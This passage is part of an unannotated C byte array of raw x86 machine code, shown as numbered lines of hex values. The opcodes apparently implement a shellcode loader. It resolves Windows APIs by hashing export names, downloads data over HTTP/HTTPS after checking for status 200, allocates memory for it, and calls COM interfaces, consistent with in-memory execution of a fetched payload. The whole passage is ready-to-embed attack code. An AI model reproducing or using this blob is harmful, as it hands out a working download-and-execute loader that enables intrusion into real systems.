119 0x50, 0xff, 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48, 0x33, 0xc0,
120 0x40, 0xeb, 0x02, 0x33, 0xc0, 0x5f, 0x5d, 0x5e, 0x5b, 0x59, 0xc3, 0x51,
121 0x53, 0x56, 0x8b, 0x74, 0x24, 0x10, 0x8d, 0x86, 0x4c, 0x03, 0x00, 0x00,
122 0x50, 0xff, 0x56, 0x30, 0x8b, 0xd8, 0x85, 0xdb, 0x75, 0x06, 0x40, 0xe9,
123 0xc5, 0x00, 0x00, 0x00, 0x55, 0x57, 0x8d, 0x86, 0x5c, 0x03, 0x00, 0x00,
124 0x50, 0x53, 0xff, 0x56, 0x34, 0x8b, 0xe8, 0x85, 0xed, 0x0f, 0x84, 0xaa,
125 0x00, 0x00, 0x00, 0xbf, 0xda, 0x2a, 0x40, 0x00, 0x81, 0xef, 0x0e, 0x14,
126 0x40, 0x00, 0x0f, 0x88, 0x99, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x18,
127 0x50, 0x6a, 0x40, 0x57, 0x55, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x0f, 0x84,
128 0x85, 0x00, 0x00, 0x00, 0x57, 0xe8, 0xf2, 0x14, 0x00, 0x00, 0xb9, 0x0e,
129 0x14, 0x40, 0x00, 0x81, 0xe9, 0xe4, 0x2a, 0x40, 0x00, 0x03, 0xc1, 0x50,
130 0x55, 0xe8, 0x7b, 0x17, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24,
131 0x10, 0x50, 0xff, 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48, 0x8d,
132 0x86, 0x7c, 0x03, 0x00, 0x00, 0x50, 0x53, 0xff, 0x56, 0x34, 0x8b, 0xe8,
133 0x85, 0xed, 0x74, 0x49, 0xbf, 0xd1, 0x2a, 0x40, 0x00, 0xbb, 0xc2, 0x2a,
134 0x40, 0x00, 0x2b, 0xfb, 0x78, 0x3b, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x6a,
135 0x40, 0x57, 0x55, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x57, 0xe8,
136 0x98, 0x14, 0x00, 0x00, 0x81, 0xeb, 0xe4, 0x2a, 0x40, 0x00, 0x03, 0xc3,
137 0x50, 0x55, 0xe8, 0x26, 0x17, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44,
138 0x24, 0x10, 0x50, 0xff, 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48,
139 0x33, 0xc0, 0x40, 0xeb, 0x02, 0x33, 0xc0, 0x5f, 0x5d, 0x5e, 0x5b, 0x59,
140 0xc3, 0x81, 0xec, 0x58, 0x02, 0x00, 0x00, 0x53, 0x56, 0x57, 0x6a, 0x3c,
141 0x5f, 0x33, 0xf6, 0x8d, 0x44, 0x24, 0x28, 0x57, 0x56, 0x50, 0x89, 0x74,
142 0x24, 0x20, 0xbb, 0x00, 0x02, 0x60, 0x84, 0xe8, 0x09, 0x17, 0x00, 0x00,
143 0x8d, 0x44, 0x24, 0x70, 0x89, 0x7c, 0x24, 0x34, 0x8b, 0xbc, 0x24, 0x74,
144 0x02, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x89, 0x44, 0x24, 0x38, 0x8d, 0x84,
145 0x24, 0x64, 0x01, 0x00, 0x00, 0x89, 0x44, 0x24, 0x54, 0xb8, 0x00, 0x01,
146 0x00, 0x00, 0x89, 0x44, 0x24, 0x3c, 0x89, 0x44, 0x24, 0x58, 0x8d, 0x44,
147 0x24, 0x28, 0x50, 0x68, 0x00, 0x00, 0x00, 0x10, 0x56, 0x8d, 0x87, 0x10,
148 0x05, 0x00, 0x00, 0x50, 0xff, 0x57, 0x7c, 0x85, 0xc0, 0x0f, 0x84, 0xb4,
149 0x01, 0x00, 0x00, 0x33, 0xc0, 0x83, 0x7c, 0x24, 0x34, 0x04, 0x56, 0x56,
150 0x0f, 0x94, 0xc0, 0x56, 0x89, 0x44, 0x24, 0x1c, 0xb8, 0x00, 0x32, 0xe0,
151 0x84, 0x56, 0x56, 0x0f, 0x44, 0xd8, 0xff, 0x97, 0x80, 0x00, 0x00, 0x00,
152 0x8b, 0xc8, 0x89, 0x4c, 0x24, 0x24, 0x85, 0xc9, 0x0f, 0x84, 0x85, 0x01,
153 0x00, 0x00, 0x39, 0x74, 0x24, 0x10, 0xba, 0xbb, 0x01, 0x00, 0x00, 0x56,
154 0x56, 0x6a, 0x03, 0x56, 0x56, 0x6a, 0x50, 0x58, 0x0f, 0x45, 0xc2, 0x0f,
155 0xb7, 0xc0, 0x50, 0x8d, 0x44, 0x24, 0x7c, 0x50, 0x51, 0xff, 0x97, 0x84,
156 0x00, 0x00, 0x00, 0x8b, 0xc8, 0x89, 0x4c, 0x24, 0x20, 0x85, 0xc9, 0x0f,
157 0x84, 0xfb, 0x00, 0x00, 0x00, 0x55, 0x56, 0x53, 0x56, 0x56, 0x56, 0x8d,
158 0x84, 0x24, 0x7c, 0x01, 0x00, 0x00, 0x50, 0x8d, 0x87, 0x10, 0x06, 0x00,
159 0x00, 0x50, 0x51, 0xff, 0x97, 0x94, 0x00, 0x00, 0x00, 0x8b, 0xe8, 0x85,
160 0xed, 0x0f, 0x84, 0xca, 0x00, 0x00, 0x00, 0x39, 0x74, 0x24, 0x14, 0x74,
161 0x20, 0xf7, 0xc3, 0x00, 0x10, 0x00, 0x00, 0x74, 0x18, 0x6a, 0x04, 0x8d,
162 0x44, 0x24, 0x20, 0xc7, 0x44, 0x24, 0x20, 0x80, 0x33, 0x00, 0x00, 0x50,
163 0x6a, 0x1f, 0x55, 0xff, 0x97, 0x88, 0x00, 0x00, 0x00, 0x56, 0x56, 0x56,
164 0x56, 0x55, 0xff, 0x97, 0x98, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84,
165 0x8a, 0x00, 0x00, 0x00, 0x56, 0x8d, 0x44, 0x24, 0x14, 0xc7, 0x44, 0x24,
166 0x14, 0x04, 0x00, 0x00, 0x00, 0x50, 0x8d, 0x44, 0x24, 0x20, 0x50, 0x68,
167 0x13, 0x00, 0x00, 0x20, 0x55, 0xff, 0x97, 0x9c, 0x00, 0x00, 0x00, 0x85,
168 0xc0, 0x74, 0x67, 0x81, 0x7c, 0x24, 0x18, 0xc8, 0x00, 0x00, 0x00, 0x75,
169 0x5d, 0x56, 0x8d, 0x44, 0x24, 0x14, 0xc7, 0x44, 0x24, 0x14, 0x04, 0x00,
170 0x00, 0x00, 0x50, 0x8d, 0x9f, 0x40, 0x07, 0x00, 0x00, 0x53, 0x68, 0x05,
171 0x00, 0x00, 0x20, 0x55, 0x89, 0x33, 0x89, 0x73, 0x04, 0xff, 0x97, 0x9c,
172 0x00, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x33, 0x8b, 0x03, 0x0b, 0x43, 0x04,
173 0x74, 0x2c, 0x6a, 0x04, 0x68, 0x00, 0x30, 0x00, 0x00, 0xff, 0x33, 0x56,
174 0xff, 0x57, 0x3c, 0x89, 0x87, 0x48, 0x07, 0x00, 0x00, 0x85, 0xc0, 0x74,
175 0x15, 0x8d, 0x4c, 0x24, 0x20, 0x89, 0x74, 0x24, 0x20, 0x51, 0xff, 0x33,
176 0x50, 0x55, 0xff, 0x97, 0x8c, 0x00, 0x00, 0x00, 0x8b, 0xf0, 0x55, 0xff,
177 0x97, 0x90, 0x00, 0x00, 0x00, 0xff, 0x74, 0x24, 0x24, 0xff, 0x97, 0x90,
178 0x00, 0x00, 0x00, 0x5d, 0xff, 0x74, 0x24, 0x24, 0xff, 0x97, 0x90, 0x00,
179 0x00, 0x00, 0x85, 0xf6, 0x74, 0x45, 0xff, 0xb7, 0x40, 0x07, 0x00, 0x00,
180 0x8b, 0x9f, 0x48, 0x07, 0x00, 0x00, 0x8d, 0x87, 0x30, 0x07, 0x00, 0x00,
181 0x53, 0x50, 0x8d, 0x87, 0x20, 0x07, 0x00, 0x00, 0x50, 0xe8, 0x0e, 0x14,
182 0x00, 0x00, 0xff, 0x77, 0x2c, 0x8d, 0x87, 0x18, 0x06, 0x00, 0x00, 0xff,
183 0x77, 0x28, 0x50, 0xe8, 0xd7, 0x12, 0x00, 0x00, 0x83, 0xc4, 0x1c, 0x3b,
184 0x83, 0x08, 0x19, 0x00, 0x00, 0x75, 0x0c, 0x3b, 0x93, 0x0c, 0x19, 0x00,
185 0x00, 0x75, 0x04, 0x8b, 0xc6, 0xeb, 0x02, 0x33, 0xc0, 0x5f, 0x5e, 0x5b,
186 0x81, 0xc4, 0x58, 0x02, 0x00, 0x00, 0xc3, 0x81, 0xec, 0xdc, 0x01, 0x00,
187 0x00, 0x53, 0x55, 0x56, 0x8b, 0xb4, 0x24, 0xf0, 0x01, 0x00, 0x00, 0x57,
188 0x8b, 0x6e, 0x3c, 0x8b, 0x44, 0x2e, 0x78, 0x85, 0xc0, 0x0f, 0x84, 0xe5,
189 0x00, 0x00, 0x00, 0x8d, 0x3c, 0x30, 0x8b, 0x5f, 0x18, 0x85, 0xdb, 0x0f,
190 0x84, 0xd7, 0x00, 0x00, 0x00, 0x8b, 0x47, 0x1c, 0x33, 0xd2, 0x03, 0xc6,
191 0x89, 0x54, 0x24, 0x10, 0x89, 0x44, 0x24, 0x24, 0x8b, 0x47, 0x20, 0x03,
192 0xc6, 0x89, 0x44, 0x24, 0x14, 0x8b, 0x47, 0x24, 0x03, 0xc6, 0x89, 0x44,
193 0x24, 0x20, 0x8b, 0x47, 0x0c, 0x03, 0xc6, 0x8a, 0x08, 0x84, 0xc9, 0x74,
194 0x2a, 0x8b, 0x74, 0x24, 0x10, 0x8d, 0x94, 0x24, 0xe8, 0x00, 0x00, 0x00,
195 0x2b, 0xd0, 0x80, 0xc9, 0x20, 0x46, 0x88, 0x0c, 0x02, 0x40, 0x8a, 0x08,
196 0x84, 0xc9, 0x75, 0xf2, 0x89, 0x74, 0x24, 0x10, 0x8b, 0xb4, 0x24, 0xf4,
197 0x01, 0x00, 0x00, 0x8b, 0x54, 0x24, 0x10, 0xff, 0xb4, 0x24, 0x04, 0x02,
198 0x00, 0x00, 0x8d, 0x84, 0x24, 0xec, 0x00, 0x00, 0x00, 0xc6, 0x84, 0x14,
199 0xec, 0x00, 0x00, 0x00, 0x00, 0xff, 0xb4, 0x24, 0x04, 0x02, 0x00, 0x00,
200 0x50, 0xe8, 0x0d, 0x12, 0x00, 0x00, 0x89, 0x44, 0x24, 0x24, 0x83, 0xc4,
201 0x0c, 0x8b, 0x44, 0x24, 0x14, 0x83, 0xc0, 0xfc, 0x89, 0x54, 0x24, 0x1c,
202 0x8d, 0x04, 0x98, 0x89, 0x44, 0x24, 0x10, 0xff, 0xb4, 0x24, 0x04, 0x02,
203 0x00, 0x00, 0x8b, 0x08, 0xff, 0xb4, 0x24, 0x04, 0x02, 0x00, 0x00, 0x03,
204 0xce, 0x51, 0xe8, 0xdc, 0x11, 0x00, 0x00, 0x33, 0x44, 0x24, 0x24, 0x83,
205 0xc4, 0x0c, 0x33, 0x54, 0x24, 0x1c, 0x3b, 0x84, 0x24, 0xf8, 0x01, 0x00,
206 0x00, 0x75, 0x09, 0x3b, 0x94, 0x24, 0xfc, 0x01, 0x00, 0x00, 0x74, 0x1d,
207 0x8b, 0x44, 0x24, 0x10, 0x83, 0xe8, 0x04, 0x89, 0x44, 0x24, 0x10, 0x83,
208 0xeb, 0x01, 0x75, 0xbb, 0x33, 0xc0, 0x5f, 0x5e, 0x5d, 0x5b, 0x81, 0xc4,
209 0xdc, 0x01, 0x00, 0x00, 0xc3, 0x8b, 0x44, 0x24, 0x20, 0x8b, 0x4c, 0x24,
210 0x24, 0x0f, 0xb7, 0x44, 0x58, 0xfe, 0x8b, 0x0c, 0x81, 0x03, 0xce, 0x3b,
211 0xcf, 0x72, 0x7d, 0x8b, 0x44, 0x2e, 0x7c, 0x03, 0xc7, 0x3b, 0xc8, 0x73,
212 0x73, 0x33, 0xd2, 0x38, 0x11, 0x74, 0x1e, 0x8d, 0x7c, 0x24, 0x28, 0x8b,
213 0xf1, 0x2b, 0xf9, 0x83, 0xfa, 0x3c, 0x73, 0x11, 0x8a, 0x06, 0x88, 0x04,
214 0x37, 0x80, 0x3e, 0x2e, 0x74, 0x07, 0x42, 0x46, 0x80, 0x3e, 0x00, 0x75,
215 0xea, 0xc7, 0x44, 0x14, 0x29, 0x64, 0x6c, 0x6c, 0x00, 0x42, 0x03, 0xca,
216 0x33, 0xd2, 0x38, 0x11, 0x74, 0x17, 0x8d, 0x74, 0x24, 0x68, 0x2b, 0xf1,
217 0x83, 0xfa, 0x7f, 0x73, 0x0c, 0x8a, 0x01, 0x42, 0x88, 0x04, 0x0e, 0x41,
218 0x80, 0x39, 0x00, 0x75, 0xef, 0x8b, 0xb4, 0x24, 0xf0, 0x01, 0x00, 0x00,
219 0x8d, 0x44, 0x24, 0x28, 0x50, 0xc6, 0x44, 0x14, 0x6c, 0x00, 0xff, 0x56,
220 0x30, 0x85, 0xc0, 0x74, 0x0d, 0x8d, 0x4c, 0x24, 0x68, 0x51, 0x50, 0xff,
221 0x56, 0x34, 0x8b, 0xc8, 0xeb, 0x02, 0x33, 0xc9, 0x8b, 0xc1, 0xe9, 0x5b,
222 0xff, 0xff, 0xff, 0x56, 0x8b, 0x74, 0x24, 0x0c, 0x57, 0x33, 0xff, 0x8b,
223 0x4e, 0x18, 0x85, 0xc9, 0x74, 0x09, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x08,
224 0x89, 0x7e, 0x18, 0x8b, 0x4e, 0x1c, 0x85, 0xc9, 0x74, 0x09, 0x8b, 0x01,
225 0x51, 0xff, 0x50, 0x08, 0x89, 0x7e, 0x1c, 0x8b, 0x4e, 0x14, 0x85, 0xc9,
226 0x74, 0x09, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x08, 0x89, 0x7e, 0x14, 0x8b,
227 0x4e, 0x10, 0x85, 0xc9, 0x74, 0x09, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x08,
228 0x89, 0x7e, 0x10, 0x8b, 0x4e, 0x0c, 0x85, 0xc9, 0x74, 0x09, 0x8b, 0x01,
229 0x51, 0xff, 0x50, 0x08, 0x89, 0x7e, 0x0c, 0x8b, 0x4e, 0x08, 0x85, 0xc9,
230 0x74, 0x12, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x2c, 0x8b, 0x46, 0x08, 0x50,
231 0x8b, 0x08, 0xff, 0x51, 0x08, 0x89, 0x7e, 0x08, 0x8b, 0x4e, 0x04, 0x85,
232 0xc9, 0x74, 0x09, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x08, 0x89, 0x7e, 0x04,
233 0x8b, 0x0e, 0x85, 0xc9, 0x74, 0x08, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x08,
234 0x89, 0x3e, 0x5f, 0x5e, 0xc3, 0x8b, 0x44, 0x24, 0x04, 0x83, 0xc0, 0x10,
235 0xf0, 0xff, 0x00, 0x8b, 0x00, 0xc2, 0x04, 0x00, 0xb8, 0x01, 0x40, 0x00,
236 0x80, 0xc2, 0x0c, 0x00, 0xb8, 0x01, 0x40, 0x00, 0x80, 0xc2, 0x10, 0x00,
237 0xb8, 0x01, 0x40, 0x00, 0x80, 0xc2, 0x08, 0x00, 0x8b, 0x44, 0x24, 0x04,
238 0xff, 0x74, 0x24, 0x18, 0xff, 0x74, 0x24, 0x14, 0x8b, 0x40, 0x08, 0xff,
239 0x74, 0x24, 0x14, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x28, 0xc2, 0x18, 0x00,
240 0xb8, 0x01, 0x40, 0x00, 0x80, 0xc2, 0x14, 0x00, 0x57, 0x8b, 0x7c, 0x24,
241 0x14, 0x85, 0xff, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x16,
242 0x56, 0x8b, 0x74, 0x24, 0x0c, 0x8b, 0x46, 0x08, 0x50, 0x8b, 0x08, 0xff,
243 0x51, 0x04, 0x8b, 0x46, 0x08, 0x89, 0x07, 0x33, 0xc0, 0x5e, 0x5f, 0xc2,
244 0x10, 0x00, 0x8b, 0x44, 0x24, 0x08, 0x85, 0xc0, 0x75, 0x07, 0xb8, 0x03,
245 0x40, 0x00, 0x80, 0xeb, 0x08, 0xc7, 0x00, 0x01, 0x00, 0x00, 0x00, 0x33,
246 0xc0, 0xc2, 0x08, 0x00, 0x55, 0x8b, 0xec, 0xff, 0x75, 0x28, 0x8b, 0x45,
247 0x08, 0xff, 0x75, 0x24, 0xff, 0x75, 0x20, 0x8b, 0x48, 0x08, 0xff, 0x75,
248 0x1c, 0xff, 0x75, 0x18, 0x8b, 0x11, 0xff, 0x75, 0x0c, 0x50, 0x51, 0xff,
249 0x52, 0x2c, 0x5d, 0xc2, 0x24, 0x00, 0x53, 0x56, 0x57, 0xe8, 0x42, 0x0f,
250 0x00, 0x00, 0x8b, 0x74, 0x24, 0x14, 0xb9, 0x13, 0x1e, 0x40, 0x00, 0xbf,
251 0xe4, 0x2a, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x08,
252 0xe8, 0x27, 0x0f, 0x00, 0x00, 0xb9, 0xe5, 0x1a, 0x40, 0x00, 0x2b, 0xcf,
253 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x04, 0xe8, 0x14, 0x0f, 0x00, 0x00,
254 0xb9, 0x9c, 0x1e, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89,
255 0x48, 0x08, 0xe8, 0x01, 0x0f, 0x00, 0x00, 0xb9, 0x5a, 0x1b, 0x40, 0x00,
256 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x0c, 0xe8, 0xee, 0x0e,
257 0x00, 0x00, 0xb9, 0x30, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b,
258 0x06, 0x89, 0x48, 0x10, 0xe8, 0xdb, 0x0e, 0x00, 0x00, 0xb9, 0x0c, 0x1b,
259 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x14, 0xe8,
260 0xc8, 0x0e, 0x00, 0x00, 0xb9, 0x74, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03,
261 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x18, 0xe8, 0xb5, 0x0e, 0x00, 0x00, 0xb9,
262 0x71, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48,
263 0x1c, 0xe8, 0xa2, 0x0e, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b,
264 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x20, 0xe8, 0x8f, 0x0e, 0x00,
265 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06,
266 0x89, 0x48, 0x24, 0xe8, 0x7c, 0x0e, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40,
267 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x28, 0xe8, 0x69,
268 0x0e, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8,
269 0x8b, 0x06, 0x89, 0x48, 0x2c, 0xe8, 0x56, 0x0e, 0x00, 0x00, 0xb9, 0x04,
270 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x30,
271 0xe8, 0x43, 0x0e, 0x00, 0x00, 0xb9, 0x84, 0x1e, 0x40, 0x00, 0x2b, 0xcf,
272 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x34, 0xe8, 0x30, 0x0e, 0x00, 0x00,
273 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89,
274 0x48, 0x38, 0xe8, 0x1d, 0x0e, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00,
275 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x3c, 0xe8, 0x0a, 0x0e,
276 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b,
277 0x06, 0x89, 0x48, 0x40, 0xe8, 0xf7, 0x0d, 0x00, 0x00, 0xb9, 0x04, 0x1b,
278 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x44, 0xe8,
279 0xe4, 0x0d, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03,
280 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x48, 0xe8, 0xd1, 0x0d, 0x00, 0x00, 0xb9,
281 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48,
282 0x4c, 0xe8, 0xbe, 0x0d, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b,
283 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x50, 0xe8, 0xab, 0x0d, 0x00,
284 0x00, 0xb9, 0xfc, 0x1a, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06,
285 0x89, 0x48, 0x54, 0xe8, 0x98, 0x0d, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40,
286 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x58, 0xe8, 0x85,
287 0x0d, 0x00, 0x00, 0xb9, 0x28, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8,
288 0x8b, 0x06, 0x89, 0x48, 0x5c, 0xe8, 0x72, 0x0d, 0x00, 0x00, 0xb9, 0x04,
289 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x60,
290 0xe8, 0x5f, 0x0d, 0x00, 0x00, 0xb9, 0xac, 0x1e, 0x40, 0x00, 0x2b, 0xcf,
291 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x64, 0xe8, 0x4c, 0x0d, 0x00, 0x00,
292 0xb9, 0xf4, 0x1a, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89,
293 0x48, 0x68, 0xe8, 0x39, 0x0d, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00,
294 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x6c, 0xe8, 0x26, 0x0d,
295 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b,
296 0x06, 0x89, 0x48, 0x70, 0xe8, 0x13, 0x0d, 0x00, 0x00, 0xb9, 0x04, 0x1b,
297 0x40, 0x00, 0x8d, 0x5e, 0x04, 0x2b, 0xcf, 0x8b, 0x7c, 0x24, 0x10, 0x03,
298 0xc8, 0x8b, 0x06, 0x53, 0x89, 0x48, 0x74, 0x8d, 0x87, 0xdc, 0x03, 0x00,
299 0x00, 0x83, 0x66, 0x10, 0x00, 0x50, 0x89, 0x7e, 0x14, 0xff, 0x57, 0x78,
300 0x85, 0xc0, 0x75, 0x13, 0x8b, 0x0b, 0x8d, 0x46, 0x08, 0x50, 0x8d, 0x87,
301 0x8c, 0x04, 0x00, 0x00, 0x50, 0x8b, 0x11, 0x51, 0xff, 0x52, 0x18, 0x5f,
302 0x5e, 0x5b, 0xc3, 0x8b, 0x54, 0x24, 0x0c, 0x85, 0xd2, 0x75, 0x07, 0xb8,
303 0x03, 0x40, 0x00, 0x80, 0xeb, 0x5f, 0x53, 0x8b, 0x5c, 0x24, 0x0c, 0x33,
304 0xc9, 0x56, 0x8b, 0x74, 0x24, 0x0c, 0x57, 0x8b, 0x7e, 0x14, 0x8b, 0x84,
305 0x8f, 0xfc, 0x03, 0x00, 0x00, 0x3b, 0x04, 0x8b, 0x75, 0x08, 0x41, 0x83,
306 0xf9, 0x04, 0x75, 0xee, 0xeb, 0x2a, 0x33, 0xc9, 0x8b, 0x84, 0x8f, 0x0c,
307 0x04, 0x00, 0x00, 0x3b, 0x04, 0x8b, 0x75, 0x08, 0x41, 0x83, 0xf9, 0x04,
308 0x75, 0xee, 0xeb, 0x14, 0x33, 0xc9, 0x8b, 0x84, 0x8f, 0x8c, 0x04, 0x00,
309 0x00, 0x3b, 0x04, 0x8b, 0x75, 0x0c, 0x41, 0x83, 0xf9, 0x04, 0x75, 0xee,
310 0x89, 0x32, 0x33, 0xc0, 0xeb, 0x08, 0x83, 0x22, 0x00, 0xb8, 0x02, 0x40,
311 0x00, 0x80, 0x5f, 0x5e, 0x5b, 0xc2, 0x0c, 0x00, 0x8b, 0x44, 0x24, 0x04,
312 0x6a, 0x00, 0x6a, 0x00, 0x6a, 0xfd, 0x8b, 0x40, 0x0c, 0x50, 0x8b, 0x08,
313 0xff, 0x51, 0x38, 0x33, 0xc0, 0xc2, 0x08, 0x00, 0x8b, 0x4c, 0x24, 0x04,
314 0x83, 0xc8, 0xff, 0xf0, 0x0f, 0xc1, 0x41, 0x10, 0x48, 0xc2, 0x04, 0x00,
315 0x8b, 0x44, 0x24, 0x04, 0xff, 0x74, 0x24, 0x08, 0x8b, 0x40, 0x14, 0xff,
316 0x50, 0x4c, 0x33, 0xc0, 0xc2, 0x08, 0x00, 0x83, 0xec, 0x14, 0x53, 0x8b,
317 0x5c, 0x24, 0x1c, 0x55, 0x56, 0x57, 0x33, 0xff, 0x8d, 0xab, 0x48, 0x07,
318 0x00, 0x00, 0x83, 0xbb, 0x0c, 0x05, 0x00, 0x00, 0x01, 0x8b, 0xc7, 0x89,
319 0x7c, 0x24, 0x10, 0x74, 0x03, 0x8b, 0x6d, 0x00, 0x8b, 0x8b, 0xa4, 0x00,
320 0x00, 0x00, 0x8b, 0x74, 0x24, 0x2c, 0x85, 0xc9, 0x0f, 0x84, 0xc5, 0x01,
321 0x00, 0x00, 0x56, 0x8d, 0x83, 0x2c, 0x04, 0x00, 0x00, 0x50, 0x8d, 0x83,
322 0x1c, 0x04, 0x00, 0x00, 0x50, 0xff, 0xd1, 0x85, 0xc0, 0x0f, 0x88, 0x89,
323 0x01, 0x00, 0x00, 0x8b, 0x16, 0x8d, 0x7e, 0x04, 0x57, 0x8d, 0x83, 0x3c,
324 0x04, 0x00, 0x00, 0x50, 0x8b, 0x0a, 0x8d, 0x45, 0x04, 0x50, 0x52, 0xff,
325 0x51, 0x0c, 0x85, 0xc0, 0x0f, 0x88, 0x62, 0x01, 0x00, 0x00, 0x8b, 0x07,
326 0x8d, 0x54, 0x24, 0x14, 0x52, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x28, 0x85,
327 0xc0, 0x0f, 0x88, 0x5c, 0x01, 0x00, 0x00, 0x83, 0x7c, 0x24, 0x14, 0x00,
328 0x74, 0x1a, 0x8b, 0x0f, 0x8d, 0x46, 0x08, 0x50, 0x8d, 0x83, 0x5c, 0x04,
329 0x00, 0x00, 0x50, 0x8b, 0x11, 0x8d, 0x83, 0x4c, 0x04, 0x00, 0x00, 0x50,
330 0x51, 0xff, 0x52, 0x24, 0x33, 0xff, 0x85, 0xc0, 0x0f, 0x88, 0x33, 0x01,
331 0x00, 0x00, 0x8b, 0x46, 0x08, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x28, 0x85,
332 0xc0, 0x0f, 0x88, 0x05, 0x01, 0x00, 0x00, 0x8d, 0x85, 0x04, 0x02, 0x00,
333 0x00, 0x50, 0xff, 0x53, 0x70, 0x8b, 0x56, 0x08, 0x8b, 0xf8, 0x8d, 0x46,
334 0x0c, 0x50, 0x6a, 0x00, 0x8b, 0x0a, 0x57, 0x52, 0x89, 0x44, 0x24, 0x28,
335 0xff, 0x51, 0x30, 0x57, 0x8b, 0xf0, 0xff, 0x53, 0x74, 0x85, 0xf6, 0x0f,
336 0x88, 0xd7, 0x00, 0x00, 0x00, 0x8b, 0x54, 0x24, 0x18, 0x8b, 0x74, 0x24,
337 0x2c, 0x8b, 0x12, 0x8d, 0x46, 0x10, 0x50, 0x8d, 0x83, 0x6c, 0x04, 0x00,
338 0x00, 0x8b, 0x0a, 0x50, 0x52, 0xff, 0x11, 0x85, 0xc0, 0x0f, 0x88, 0xb5,
339 0x00, 0x00, 0x00, 0x83, 0x64, 0x24, 0x20, 0x00, 0x8b, 0x85, 0x10, 0x19,
340 0x00, 0x00, 0x89, 0x44, 0x24, 0x1c, 0x8d, 0x44, 0x24, 0x1c, 0x50, 0x6a,
341 0x01, 0x6a, 0x11, 0xff, 0x53, 0x58, 0x8b, 0xf8, 0x85, 0xff, 0x0f, 0x84,
342 0x90, 0x00, 0x00, 0x00, 0x8b, 0x57, 0x0c, 0x33, 0xc0, 0x8b, 0xc8, 0x39,
343 0x85, 0x14, 0x19, 0x00, 0x00, 0x72, 0x2d, 0x77, 0x08, 0x39, 0x85, 0x10,
344 0x19, 0x00, 0x00, 0x76, 0x23, 0x33, 0xdb, 0x8a, 0x84, 0x29, 0x18, 0x19,
345 0x00, 0x00, 0x88, 0x04, 0x0a, 0x41, 0x3b, 0x9d, 0x14, 0x19, 0x00, 0x00,
